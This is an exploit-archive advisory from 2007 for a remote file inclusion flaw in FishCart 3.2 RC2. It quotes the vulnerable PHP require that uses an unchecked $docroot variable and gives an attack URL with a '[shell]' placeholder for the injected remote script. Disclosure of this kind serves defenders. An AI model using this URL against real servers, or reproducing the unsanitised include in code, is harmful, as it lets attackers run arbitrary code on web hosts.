FishCart <= 3.2 RC2 (fc_example.php) Remote File Inclusion Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : FishCart <= 3.2 RC2 (fc_example.php) Remote File Inclusion Vulnerability
# Published : 2007-08-08
# Author : k1n9k0ng
# Previous Title : Ncaster 1.7.2 (archive.php) Remote File Inclusion Vulnerability
# Next Title : PhpHostBot <= 1.06 (svr_rootscript) Remote File Inclusion Vulnerability

fishcart_v3 (fc_example.php) Remote File Include Vulnerability

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Scripts            : fishcart_v3
Discovered By : k1n9k0ng
Scripts site      :
http://fishcart.org/fc_installer_snap_2007_08_03.zip
http://fishcart.org/fishcart_snap_2007_08_03
http://fishcart.org/fishcart_snap_2007_08_03.tgz

Thanks To       : #sekuritionline, #semprol, #mimid, #r.i.p, #x-code, #yogyafree
special To       : adhietslank, babypunk, bugs_, cyberlog, cah_gemblunkz
site                 : www.sekuritionline.net
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

bug Script:
<?php require($docroot.'/FCDIRECTORY/fc_functions/fc_functions.php'); ?>

bug found:
"/fishcart_v3/fc_functions/fc_example.php?docroot=[shell]"

# www.Syue.com [2007-08-08]